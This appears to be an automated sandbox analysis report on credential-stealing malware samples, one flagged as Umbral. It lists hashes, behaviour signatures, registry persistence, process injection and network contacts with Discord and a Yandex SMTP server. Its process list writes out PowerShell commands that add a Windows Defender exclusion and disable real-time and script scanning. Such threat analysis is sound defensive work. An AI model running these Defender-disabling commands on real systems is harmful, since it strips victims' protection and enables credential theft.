C:\Users\Admin\AppData\Local\Temp\9aa2486c-af8f-4add-bc44-5514dd129b38.vbs
| MD5 | 0b0749de7c4301b78b8350e9251fa22e |
| SHA1 | 476e3228368a092a257adac380741417d2bb0d94 |
| SHA256 | afbb0ac0be3b7ae469ef2b2478b3357dd689aec71f913e4f3fe1ba76a2eb67fc |
| SHA512 | be02fb5cc0623819cfe1e73363a6539071407c89e9a1a33542a1109a77e7cae665e0322d188b10fd9074dbdcdf2dff97b525736db8b6961a7c413a23a7908e49 |
C:\Users\Admin\AppData\Local\Temp\35759043-3256-4dbb-a295-53a22ceb79d6.vbs
| MD5 | c2a150fb928ca9efc370146e13a49ff0 |
| SHA1 | cb3b5b1a2c1641466827837f0543c98a52b51146 |
| SHA256 | e279e09607455b6fe7e5210b368a2cbb94f485ca341c4622facd4e86701ccb08 |
| SHA512 | 05f954315dc988ec32e4559a5585ccb7c9559d897b5fef47ae294c40dfec61b88fb07a48789a2289f751fc0d051ff948dff64ff17a47cbe4ef3d02f35eafa8da |
Analysis: behavioral3
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20241010-en
Max time kernel
16s
Max time network
24s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Umbral family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe
"C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
Files
memory/108-0-0x000007FEF65A3000-0x000007FEF65A4000-memory.dmp
memory/108-1-0x0000000001020000-0x0000000001060000-memory.dmp
memory/108-2-0x000007FEF65A0000-0x000007FEF6F8C000-memory.dmp
memory/2424-7-0x000007FEEDE3E000-0x000007FEEDE3F000-memory.dmp
memory/2424-8-0x000000001B1D0000-0x000000001B4B2000-memory.dmp
memory/2424-9-0x0000000002560000-0x0000000002568000-memory.dmp
memory/2424-10-0x000007FEEDB80000-0x000007FEEE51D000-memory.dmp
memory/2424-11-0x000007FEEDB80000-0x000007FEEE51D000-memory.dmp
memory/2424-13-0x000007FEEDB80000-0x000007FEEE51D000-memory.dmp
memory/2424-12-0x00000000026AB000-0x0000000002712000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | e96770687ffc3c0dce62ec3838e9e016 |
| SHA1 | da5d6fd725ecf9f958a67ab6259e75983814b24d |
| SHA256 | ff70c9dc86025288062a5a7a71929ebae088b7c4c00206a45d5a2bf6489dc903 |
| SHA512 | 05d157644c26f408901fec012a89e911dde0d0987dbb432061a2f6b1480504ffd4403482b320312513eb3d87ce04632ef9a0db746e4807f1d5cb707b984d3408 |
memory/2888-19-0x000000001B210000-0x000000001B4F2000-memory.dmp
memory/2888-20-0x0000000002490000-0x0000000002498000-memory.dmp
memory/108-21-0x000007FEF65A3000-0x000007FEF65A4000-memory.dmp
memory/108-22-0x000007FEF65A0000-0x000007FEF6F8C000-memory.dmp
memory/2588-34-0x0000000001D70000-0x0000000001D78000-memory.dmp
memory/108-38-0x000007FEF65A0000-0x000007FEF6F8C000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20241010-en
Max time kernel
151s
Max time network
135s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Application = "C:\\Users\\Admin\\AppData\\Roaming\\app.exe" | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2620 set thread context of 2932 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
| PID 2620 set thread context of 1360 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe
"C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\My.RawFile.exe
"C:\Users\Admin\AppData\Roaming\My.RawFile.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | smtp.yandex.com | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 23.192.18.101:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.157:80 | crl.microsoft.com | tcp |
Files
memory/2808-0-0x0000000074441000-0x0000000074442000-memory.dmp
memory/2808-1-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2808-2-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2808-12-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2808-13-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2808-25-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2808-26-0x0000000074440000-0x00000000749EB000-memory.dmp
C:\Users\Admin\AppData\Roaming\app.exe
| MD5 | 97863757bcbb19ac4b85fdee34b532c2 |
| SHA1 | 546673271b915dec79834f35767c7045b5aaf6a2 |
| SHA256 | 05186a0de5bb7938a8b1f81f215abcec797e51d48f92979b1ae5ab57d1683ec6 |
| SHA512 | 419ab1c94e00e5d278d86513d7d47c61b3b7ee7647bf4bad1e9a5baa34c7730f57210dda360ed202de7644e52ac088409592c22f369ce0aad5e624a1d0d9df77 |
memory/2620-34-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2808-33-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2620-35-0x0000000074440000-0x00000000749EB000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1e6c0b679f03b895ccda4c16b8656cfe |
| SHA1 | b72a2f6e91da319a7c9970dfcef142129464414b |
| SHA256 | 16d04037d5b8e15ada46b2cc936aacb94a6739732c36ce390f0a4f2dcd456270 |
| SHA512 | a49319824c6c3e969cf25be963764363dbad6ca4da56baafb8867784f5c701a16f383aefedd6aa543b35979d2b5c9ae4e409e801b65a643bbb3f26b9aae8eaf1 |
C:\Users\Admin\AppData\Local\Temp\Cab3B0D.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2620-44-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2620-45-0x0000000074440000-0x00000000749EB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar4A3B.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
\Users\Admin\AppData\Roaming\My.RawFile.exe
| MD5 | 5a733ef0de5e31e2e4b4abb016c0f251 |
| SHA1 | 28644040a6deac35c20fa931b5d003a97293363e |
| SHA256 | a80c77ca694eca3f6629c54572aba811e64b61975c5db2ff38c8d662d12b1ce7 |
| SHA512 | 9d09ac6b6a560643cac08345ab6ef8578011b11be7d4821d7aa1b3d76f2801d30cb4d206a4ff9335f0ece5cfa2ec8258754b2481102eac3da064e5005f7ffba9 |
memory/2620-67-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2932-79-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2932-78-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2932-77-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2932-76-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2932-74-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2932-72-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2932-70-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2932-68-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2620-92-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2620-95-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2620-96-0x0000000074440000-0x00000000749EB000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
150s
Max time network
142s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Application = "C:\\Users\\Admin\\AppData\\Roaming\\app.exe" | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4860 set thread context of 3660 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
| PID 4860 set thread context of 2696 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe
"C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\My.RawFile.exe
"C:\Users\Admin\AppData\Roaming\My.RawFile.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| BR | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | smtp.yandex.com | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/5724-0-0x0000000074BA2000-0x0000000074BA3000-memory.dmp
